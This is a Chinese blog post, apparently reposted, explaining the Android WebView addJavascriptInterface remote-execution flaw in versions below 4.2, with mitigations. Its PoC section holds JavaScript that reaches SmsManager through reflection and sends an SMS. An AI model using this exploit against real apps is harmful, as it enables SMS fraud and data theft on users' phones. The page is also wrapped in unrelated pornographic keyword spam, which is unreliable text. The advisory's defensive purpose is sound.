欧美三区_成人在线免费观看视频_欧美极品少妇xxxxⅹ免费视频_a级毛片免费播放_鲁一鲁中文字幕久久_亚洲一级特黄

Android WebView掛馬漏洞--各大廠商紛紛落馬

系統(tǒng) 2265 0
本文章由Jack_Jia編寫,轉(zhuǎn)載請注明出處。
文章鏈接:
http://blog.csdn.net/jiazhijun/article/details/11131891

作者:Jack_Jia 郵箱: 309zhijun@163.com

一、漏洞描述


近期,微信等多款安卓流行應(yīng)用曝出高危掛馬漏洞:只要點(diǎn)擊好友消息或朋友圈中的一條網(wǎng)址,手機(jī)就會自動執(zhí)行黑客指令,出現(xiàn)被安裝惡意扣費(fèi)軟件、向好友發(fā)送欺詐短信、通訊錄和短信被竊取等嚴(yán)重后果。在烏云漏洞平臺上,包括安卓版微信、QQ、騰訊微博、QQ瀏覽器、快播、百度瀏覽器、金山瀏覽器等大批應(yīng)用均被曝光同類型漏洞。


二、影響版本


Android系統(tǒng)版本低于4.2


三、漏洞原理


漏洞點(diǎn):WebView.addJavascriptInterface(Object obj, String interfaceName) ;

漏洞觸發(fā)條件:

1、使用 WebView. addJavascriptInterface方法注冊可供javascript調(diào)用的java對象。

2、使用WebView加載外部網(wǎng)頁。

3、Android系統(tǒng)版本低于4.2

漏洞原因:

Android系統(tǒng)通過WebView. addJavascriptInterface方法注冊可供javascript調(diào)用的java對象,以用于增強(qiáng)javascript的功能。但是系統(tǒng)并沒有對注冊JAVA類的方法調(diào)用的限制。導(dǎo)致攻擊者可以利用反射機(jī)制調(diào)用未注冊的其它任何JAVA類,最終導(dǎo)致javascript能力的無限增強(qiáng)。攻擊者利用該漏洞可以根據(jù)客戶端能力為所欲為。


Android WebView掛馬漏洞--各大廠商紛紛落馬


四、POC代碼


我們利用該漏洞調(diào)用SmsManager發(fā)送短信(被攻擊APK要有短信發(fā)送權(quán)限)

WebView webview = new WebView(context);

WebSettings webset= webview.getSettings();
webset.setJavaScriptEnabled(true);
webview.addJavascriptInterface(new JSInvoke(), "jsinvoke");

利用該漏洞的外部javascript腳本:

<script>

var obj_smsManager = jsinvoke.getClass().forName("android.telephony.SmsManager").getMethod("getDefault",null).invoke(null,null);

obj_smsManager.sendTextMessage("159********",null,"test",null,null);

</script>


出于安全考慮,為了防止Java層的函數(shù)被隨便調(diào)用,Google在4.2版本之后,規(guī)定允許被調(diào)用的函數(shù)必須以@JavascriptInterface進(jìn)行注解,所以如果某應(yīng)用依賴的API Level為17或者以上,就不會受該問題的影響(注:Android 4.2中API Level小于17的應(yīng)用也會受影響)。在各應(yīng)用廠商修復(fù)該問題期間,我們建議用戶暫時使用系統(tǒng)自帶的瀏覽器訪問網(wǎng)頁,并且不要訪問社交應(yīng)用中陌生人發(fā)來的鏈接。


五、相關(guān)鏈接


http://drops.wooyun.org/papers/548

http://50.56.33.56/blog/?p=314

Android WebView掛馬漏洞--各大廠商紛紛落馬


更多文章、技術(shù)交流、商務(wù)合作、聯(lián)系博主

微信掃碼或搜索:z360901061

微信掃一掃加我為好友

QQ號聯(lián)系: 360901061

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點(diǎn)擊下面給點(diǎn)支持吧,站長非常感激您!手機(jī)微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點(diǎn)擊微信右上角掃一掃功能,選擇支付二維碼完成支付。

【本文對您有幫助就好】

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描上面二維碼支持博主2元、5元、10元、自定義金額等您想捐的金額吧,站長會非常 感謝您的哦!!!

發(fā)表我的評論
最新評論 總共0條評論
主站蜘蛛池模板: 亚洲欧美中文日韩在线 | 三更饺子1最刺激的一段整集 | 色拍拍欧美视频在线看 | 国产成人免费 | 欧美精品网站 | 国产激情网站 | 国产精品毛片久久久久久久 | 亚洲免费精品视频 | 精品欧美在线精品 | 五月天婷婷网亚洲综合在线 | 两性网站| 91精品国产高清久久久久久91 | 偷偷狠狠的日日2020 | 久操久热 | 91综合视频| 成人av网站免费观看 | 8mav福利视频在线播放 | 一区二区三区在线 | 网站 | 国产精品无码永久免费888 | 中文字幕国产一区 | 婷婷激情五月综合 | 久久国产精品毛片 | 国产在线一区二区三区 | 久久99精品久久久久久琪琪 | 成人 日韩 | 欧美成年黄网站色视频 | 亚洲码在线 | 九九在线视频 | 国内精品视频在线观看 | 日本不卡在线观看免费v | 视频一区二区中文字幕 | 国产精品视频免费一区二区三区 | 国产精品爽爽va在线观看网站 | 国产精品成人av | 精品视频在线观看 | 中文字幕不卡在线观看 | 天天摸天天添 | 欧美成人免费全网站大片 | 国产三级一区二区三区 | 欧美日韩精品一区二区 | 色综合成人网 |